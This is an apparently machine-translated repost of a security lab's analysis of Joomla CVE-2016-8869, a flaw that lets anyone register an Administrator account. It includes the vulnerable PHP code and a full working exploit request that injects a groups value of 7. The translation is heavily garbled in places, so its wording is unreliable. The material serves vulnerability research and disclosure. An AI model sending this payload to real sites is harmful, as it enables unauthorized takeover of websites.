Joomla is not authorized to create a privileged user Vulnerability CVE-2 0 1 6-8 8 6 9)analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62201680579
Type myhack58
Reporter 佚名
Modified 2016-10-27T00:00:00


Author: p0wd3r (know Chong Yu 4 0 4 Security lab)

Date: 2016-10-26

0x00 vulnerability overview

1. Vulnerability description

Joomla is a free open source content management system, recently researchers found in its 3. 4. 4 to 3. 6. 3 version there are two Vulnerability: CVE-2 0 1 6-8 8 6 9, and CVE-2 0 1 6-8 8 7 0. We here only analyze the CVE-2 0 1 6-8 8 6 9, The use of the vulnerability, the attacker may be on the site closed registration in the case register the privileged user. Joomla official has for this vulnerability released upgrade Bulletin.

2. Vulnerability

The site closed registration in the case can still create a privileged user

3. Impact version

3.4.4 to 3.6.3

0x01 vulnerability reproduction

1. Environment to build


After decompression into the server directory, for example /var/www/html

Create a database:

docker run --name joomla-mysql-e MYSQL_ROOT_PASSWORD=hellojoomla-e MYSQL_DATABASE=jm-d mysql

Access server path for installation.

2. Vulnerability analysis


The registration portion can refer to: the Joomla is not authorized to create user Vulnerability CVE-2 0 1 6-8 8 7 0 The analysis of

Provide the right

Below we try to create a privileged user.

In for register the register function, we first look at $model->register($data) this registration information storage method, in components/com_users/models/registration.php in:

public function register($temp) { $params = JComponentHelper::getParams('com_users');

// Initialise the table with JUser. $user = new JUser; $data = (array) $this->getData();

// Merge in the registration data. foreach ($temp as $k => $v) { $data[$k] = $v; } ... }

You can see here using we can control the $temp to the $data assignment, and further storing the registration information. Under normal circumstances, the $data in before the assignment is this:


While under normal circumstances we can control the $temp is no groups in this array, so the normal registered user of the permissions that we set in the configuration of the permissions, the corresponding is groups of values.

Then elevate the permissions of the key lies in the change groups in the value, because the $data by the US controlled the $temp assignment, $temp the value from the request packet, so we can construct the following request packet:

POST /index. php/component/users/? task=registration. register HTTP/1.1 ... Content-Type: multipart/form-data; boundary=---- WebKitFormBoundaryefGhagtDbsLTW5qi ... Cookie: yourcookie

------WebKitFormBoundaryefGhagtDbsLTW5qi Content-Disposition: form-data; name="user[name]"

attacker2 ------WebKitFormBoundaryefGhagtDbsLTW5qi Content-Disposition: form-data; name="user[username]"

attacker2 ------WebKitFormBoundaryefGhagtDbsLTW5qi Content-Disposition: form-data; name="user[password1]"

attacker2 ------WebKitFormBoundaryefGhagtDbsLTW5qi Content-Disposition: form-data; name="user[password2]"

attacker2 ------WebKitFormBoundaryefGhagtDbsLTW5qi Content-Disposition: form-data; name="user[email1]"

attacker2@my. local ------WebKitFormBoundaryefGhagtDbsLTW5qi Content-Disposition: form-data; name="user[email2]"

attacker2@my. local ------WebKitFormBoundaryefGhagtDbsLTW5qi Content-Disposition: form-data; name="user[groups][]"

7 ------WebKitFormBoundaryefGhagtDbsLTW5qi Content-Disposition: form-data; name="option"

com_users ------WebKitFormBoundaryefGhagtDbsLTW5qi Content-Disposition: form-data; name="task"

user. register ------WebKitFormBoundaryefGhagtDbsLTW5qi Content-Disposition: form-data; name="yourtoken"

1 ------WebKitFormBoundaryefGhagtDbsLTW5qi--

Here we add a group of values: name="user[groups][]" value=7, so the user is treated as a two-dimensional array, whereby groups are identified as an array and setting an array the first value is 7, corresponding with Administrator permissions.

And then contract, through the Debug you can see the $temp to have a groups array:


Finally, we create a permission for the Administrator user attacker2: a


Through the loopholes of the registration function we can mention the right, then in allowing the registration of the case, we can through the normal registration function to provide the right?

[1] [2] next